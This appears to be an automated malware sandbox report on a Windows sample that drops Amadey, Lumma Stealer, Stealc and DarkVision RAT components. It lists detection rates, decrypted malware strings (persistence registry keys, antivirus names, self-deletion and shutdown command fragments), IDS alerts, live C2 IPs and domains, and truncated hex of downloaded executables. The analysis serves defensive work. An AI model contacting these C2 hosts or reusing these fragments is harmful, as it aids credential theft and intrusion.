Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	ReversingLabs: Detection: 83%

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 58%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4ZAAIhb[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: 185.215.113.43
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: /Zu7JuNko/index.php
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: S-%lu-
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: abc3bc1985
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: skotes.exe
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: Startup
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: rundll32
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: Programs
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: %USERPROFILE%
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: cred.dll
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: clip.dll
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: http://
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: https://
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: /quiet
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: /Plugins/
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: &unit=
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: shell32.dll
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: kernel32.dll
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: GetNativeSystemInfo
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: ProgramData\
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: AVAST Software
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: Kaspersky Lab
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: Panda Security
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: Doctor Web
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: 360TotalSecurity
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: Bitdefender
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: Norton
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: Sophos
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: Comodo
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: WinDefender
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: 0123456789
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: ------
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: ?scr=1
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: ComputerName
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: -unicode-
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: VideoID
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: DefaultSettings.XResolution
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: DefaultSettings.YResolution
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: ProductName
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: CurrentBuild
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: rundll32.exe
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: "taskkill /f /im "
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: " && timeout 1 && del
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: && Exit"
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: " && ren
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: Powershell.exe
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: shutdown -s -t 0
Source: 1.2.skotes.exe.950000.0.unpack	String decryptor: random

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 40.0.downloaded_file.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.downloaded_file.exe.a2df98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.explorer.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.powershell.exe.27fe82da4b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.downloaded_file.exe.cd0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.downloaded_file.exe.a2df98.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.powershell.exe.27fe83582f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.powershell.exe.27fe83582f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.powershell.exe.27fe82da4b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000003.2764516501.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2782167786.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.2762690548.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2941880948.0000000000AE8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2751422689.0000027FE834F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2778572701.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2751422689.0000027FE825C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49940 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49924 version: TLS 1.2

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: c92938c010.exe, 00000010.00000002.2970633275.0000000006AE2000.00000040.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	File opened: C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	File opened: C:\Users\user\AppData\Local\Temp\D6C.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	File opened: C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp	Jump to behavior

Source: firefox.exe

Memory has grown: Private usage: 1MB later: 183MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49754 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49764
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49777 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.4:55732 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49799 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49801 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49806 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49814 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49820 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49828 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49826 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49827 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49827 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49827
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49827 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49827
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49840 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49827 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49845 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49847 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49848 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49855 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49875 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49888 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49889 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49888 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49917 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49925 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49934 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49933 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49941 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49940 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49952 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49806 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49806 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49799 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49799 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49845 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49845 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49820 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49875 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49933 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49933 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.4:49879 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 154.216.20.243:443 -> 192.168.2.4:49879

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 154.216.20.243 443
Source: C:\Windows\explorer.exe	Network Connect: 185.157.162.216 5200

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	URLs: atten-supporse.biz
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	IPs: 185.157.162.216

Source: global traffic

TCP traffic: 192.168.2.4:49888 -> 185.157.162.216:5200

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 07:08:09 GMTContent-Type: application/octet-streamContent-Length: 124416Last-Modified: Mon, 09 Dec 2024 06:55:13 GMTConnection: keep-aliveETag: "67569451-1e600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 dc 6d 73 5a 00 00 00 00 00 00 00 00 f0 00 2f 00 0b 02 02 32 00 60 01 00 00 82 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 f1 01 00 c8 00 00 00 00 20 02 00 80 0c 00 00 00 d0 01 00 c8 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 f6 01 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 99 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 c5 02 01 00 00 70 00 00 00 04 01 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2d 4b 00 00 00 80 01 00 00 4c 00 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 c8 10 00 00 00 d0 01 00 00 12 00 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 23 00 00 00 f0 01 00 00 16 00 00 00 c2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 0c 00 00 00 20 02 00 00 0e 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 07:08:15 GMTContent-Type: application/octet-streamContent-Length: 1856000Last-Modified: Mon, 09 Dec 2024 06:21:14 GMTConnection: keep-aliveETag: "67568c5a-1c5200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 49 00 00 04 00 00 40 59 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 7a 6a 66 65 6c 69 71 00 d0 19 00 00 90 2f 00 00 d0 19 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 69 7a 78 6a 65 77 78 00 10 00 00 00 60 49 00 00 06 00 00 00 2a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 49 00 00 22 00 00 00 30 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 